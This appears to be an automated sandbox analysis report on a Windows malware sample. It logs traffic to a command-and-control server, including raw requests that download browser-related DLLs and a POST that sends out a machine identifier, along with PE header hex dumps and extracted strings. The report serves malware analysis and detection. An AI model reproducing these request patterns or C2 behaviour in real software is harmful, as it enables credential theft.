00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 29 Mar 2024 13:25:13 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:40:08 GMTETag: "62548418-a73b8"Expires: Fri, 29 Mar 2024 13:55:13 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 29 Mar 2024 13:25:31 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:58 GMTETag: "6254840e-3e1b8"Expires: Fri, 29 Mar 2024 13:55:31 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 29 Mar 2024 13:25:35 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 17:28:56 GMTETag: "62546558-10c5d7"Expires: Fri, 29 Mar 2024 13:55:35 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230
Source: unknown	TCP traffic detected without corresponding DNS query: 89.238.170.230

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040AF5D LocalAlloc,OutputDebugStringA,SetEnvironmentVariableA,LocalAlloc,LocalAlloc,LocalAlloc,StrStrW,lstrlenW,lstrlenW,lstrlenW,StrToIntW,LocalFree,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,InternetOpenW,InternetOpenW,InternetConnectW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,lstrlenA,HttpSendRequestW,lstrlenW,HttpSendRequestW,LocalAlloc,SetEnvironmentVariableA,LocalFree,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,CreateFileMappingW,FindCloseChangeNotification,GetLastError,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,GetLastError,CreateEventA,SetEvent,ResetEvent,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,LocalAlloc,SetEnvironmentVariableA,SetEnvironmentVariableA,LocalFree,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,lstrlenA,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,SetEnvironmentVariableA,lstrlenA,MultiByteToWideChar,MultiByteToWideChar,LocalFree,LocalFree,LocalFree,

3_2_0040AF5D

Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 89.238.170.230Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 89.238.170.230Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 89.238.170.230Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 89.238.170.230Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 89.238.170.230Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 89.238.170.230Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 89.238.170.230Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: MrBidenNeverKnowHost: 89.238.170.230Content-Length: 98Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 7c 66 72 6f 6e 74 64 65 73 6b 26 63 6f 6e 66 69 67 49 64 3d 64 31 66 63 39 35 63 36 31 37 39 62 65 34 62 30 62 34 66 39 33 65 66 66 36 61 62 33 66 30 38 66 Data Ascii: machineId=9e146be9-c76a-4720-bcdb-53011b87bd06|user&configId=d1fc95c6179be4b0b4f93eff6ab3f08f

Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001586000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dll
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dllS
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll.dll
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dllU
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001586000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll7
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll;z
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlll
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dllr
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dllc
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001586000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dllE
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlla
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlldllh
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlll
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001586000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll)
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlldll
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlldll~
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlll
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlllR
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001586000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll3
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllF
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllI
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dlla
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllt
Source: RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/m
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230/w
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.238.170.230:80
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
